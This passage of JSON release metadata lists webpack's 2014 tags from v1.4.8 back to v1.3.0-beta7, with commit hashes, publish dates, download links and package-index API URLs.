1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manif